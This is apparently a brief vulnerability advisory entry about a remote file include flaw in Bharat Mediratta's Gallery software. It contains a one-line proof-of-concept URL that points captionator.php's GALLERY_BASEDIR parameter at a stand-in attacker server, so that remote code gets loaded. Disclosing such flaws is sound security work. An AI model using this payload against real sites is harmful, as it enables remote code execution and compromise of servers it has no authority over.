• info
• discussion
• exploit
• solution
• references

Bharat Mediratta Gallery Remote File Include Vulnerability

The following proof of concept was provided by avart@gmx.de:
http://hostname/gallery/captionator.php?GALLERY_BASEDIR=http://your.evil.server.tdl/